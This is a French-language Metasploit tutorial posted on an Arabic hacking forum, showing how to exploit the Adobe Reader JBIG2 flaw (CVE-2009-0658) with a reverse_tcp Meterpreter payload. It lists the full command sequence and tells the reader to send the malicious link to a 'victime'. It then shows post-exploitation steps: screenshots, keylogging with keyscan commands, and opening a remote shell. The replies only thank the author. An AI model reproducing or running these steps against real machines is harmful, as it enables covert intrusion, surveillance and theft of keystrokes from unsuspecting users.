نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 19/08/2010, 04:08   المشاركة رقم: 1
المعلومات
الكاتب:
  illuminat  
اللقب:
عضو مميز
الصورة الرمزية
 
الصورة الرمزية illuminat

البيانات
التسجيل : May 2010
العضوية : 134
الاهتمامات : Programming .Security
الإقامة : WAN
المواضيع : 76
الردود : 522
المجموع : 598
بمعدل : 0.10 يوميا
الاختراقات : [C0Y0T3]
مجتمعنا : []
الصنف : Gray Hat Hacker
آخر تواجد : 17/07/2013/19:28
سبب الغياب : الدراسة, العمل, العائلة
معدل التقييم: 17
نقاط التقييم: 11
illuminat is on a distinguished road
شكراً: 58
تم شكره 54 مرة في 26 مشاركة

 Algeria


الإتصالات
الحالة:
illuminat غير متواجد حالياً
وسائل الإتصال:

Post Metasploit et les failles dans Adobe Reader et Flash Player

Metasploit et les failles dans Adobe Reader et Flash Player Nous avons vu dernièrement l'utilisation de metasploit sous linux ,Nous allons maintenant approfondir un peu plus le sujet, en prenant pour exemple l'exploitation d'une faille dans un des logiciels de la société Adobe.

La faille (CVE-2009-0658) que nous allons utiliser pour notre exemple, concerne un problème de sécurité lors de la lecture de fichiers PDF qui utilisent la compression JBIG2. Dans certains cas, l'ouverture du fichier avec Adobe Reader peu provoquer un "Buffer overflow" et permettre ainsi à une personne malveillante de prendre le contrôle d'une machine à distance.


Attention, seules les versions suivantes d'Adobe Reader sont concernées :


* Adobe Reader v9.0.0 (Windows XP SP3)

* Adobe Reader v8.1.2 (Windows XP SP2)

Le module disponible dans Metasploit permettant de reproduire cette faille est connu sous le nom de "adobe_jbig2decode". Voici comment l'utiliser


كود:
msf > use windows/browser/adobe_jbig2decode
msf > info windows/browser/adobe_jbig2decode
msf > show options
msf > set SRVHOST 192.168.1.100
msf > set SRVPORT 80
msf > set URIPATH /
msf > show targets
msf > set targets 0
msf > show payloads
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.100
Ici, on charge le payload "reverse_tcp". Ce bout de shellcode sera exécuté sur la machine cible une fois la vulnérabilité exploitée. Une connexion de type TCP inversée sera alors initialisée et vous permettra d'ouvrir une session distante (même à travers un firewall).

Le module étant correctement configuré, on peut lancer l'attaque :

كود:
msf > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.100:4444[*] Using URL: http://1192.168.1.100:80/[*] Server started.
Un serveur web temporaire est alors démarré. Il faut ensuite envoyer l'adresse de la page ([] à une victime. Lorsque celle-ci cliquera sur le lien, un fichier PDF malveillant sera alors proposé au téléchargent. Si la personne accepte son ouverture avec Adobe Reader, Metasploit vous indiquera quelque chose comme ceci (à condition bien entendu, qu'elle utilise une des versions vulnérables citées ci-dessus) :

كود:
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 192.168.1.106:60840...[*] Sending stage (748032 bytes) to 192.168.1.106[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.106:60251)
Il ne nous reste plus qu'à ouvrir une session à distance sur la machine :
كود:
msf > sessions -i 1[*] Starting interaction with 1...
Ensuite, libre à vous de faire ce que vous voulez, comme récupérer des informations :

كود:
meterpreter > ipconfig
meterpreter > getuid
Server username: WINXP\Developer
Prendre un screenshot du bureau :
كود:
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot hack.bmp
Démarrer un keylogger afin de capturer tout ce qui est saisi au clavier :
كود:
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Ou encore ouvrir une boîte de dialogue MS-DOS :

كود:
meterpreter > shell
    Process 892 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\Developer\Desktop>
Bien entendu, la méthode décrite ci-dessous peut-être utilisée pour des failles touchant différentes versions du lecteur Adobe Flash Player ou d'Adobe Reader. Il est possible de lister l'ensemble des exploits connus avec la commande suivante sous Metasploit :

كود:
sf > search adobe
Source : Sébastien Bilbeau

illustration : Cyt.



آخر مواضيع » illuminat

توقيع : illuminat


أَنا لاعب النَرْدِ ، أَربح حيناً وأَخسر حيناً.أَنا مثلكمْ أَو أَقلُّ قليلاً ...


التعديل الأخير تم بواسطة illuminat ; 24/01/2011 الساعة 00:11
عرض البوم صور illuminat   رد مع اقتباس
قديم 31/08/2010, 01:24   المشاركة رقم: 2
المعلومات
الكاتب:
 D3r K0n!G  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
D3r K0n!G غير متواجد حالياً
وسائل الإتصال:

Emm !!
merci pour le cours frère
et j crois q il est très claire pour tt le monde

عرض البوم صور D3r K0n!G   رد مع اقتباس
قديم 13/10/2010, 07:41   المشاركة رقم: 3
المعلومات
الكاتب:
  illuminat  
اللقب:
عضو مميز

الإتصالات
الحالة:
illuminat غير متواجد حالياً
وسائل الإتصال:

Merci pour le passage Bro, Oui je crois aussi c'est si clair =p

عرض البوم صور illuminat   رد مع اقتباس
قديم 18/11/2010, 02:34   المشاركة رقم: 4
المعلومات
الكاتب:
 BlackMask  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
BlackMask غير متواجد حالياً
وسائل الإتصال:

intéressent le cours merci l'amie pour ce beau travail

عرض البوم صور BlackMask   رد مع اقتباس
قديم 23/01/2011, 23:53   المشاركة رقم: 5
المعلومات
الكاتب:
 malek2610  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
malek2610 غير متواجد حالياً
وسائل الإتصال:

Merci pour le cours mon frère, c'était bien expliqué

عرض البوم صور malek2610   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 25
00X , amir hide ip , BlackMask , Cyclone , الإمبراطور , D3r K0n!G , ExPLo!T_Dz , fire-dz , GHOS7 , hacker dz , Igor000rogI , illuminat , دام علاء العماد , lemolar , malek2610 , MdMn HaCk3r , mo3eth , oussraf , savenature , The answer , The MaSk , train7719 , ucfcool , عاشق الحور , VIP
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[dos / poc] - Flash Player (Flash6.ocx) AllowScriptAccess DoS PoC ADMINISTRATOR قسم الثغرات 0 06/12/2010 22:30
[local exploits] - Sothink Video Encoder for Adobe Flash DLL Hijacking Exploit (dwmap ADMINISTRATOR قسم الثغرات 0 30/11/2010 16:41
Adobe تطلق الإصدار X لكل من Reader و Acrobat ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 21/11/2010 10:17
MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer Dz_V!rUs [ منتدى الثغرات & أكتشافات الاعضاء ] 0 04/09/2010 14:11
Adobe تطلق النسخة الرسمية من تطبيق Flash Player 10.1 ALGHeArT [ منتدى اخبــــار الشبكـــة] 2 31/07/2010 18:53

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 01:59.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115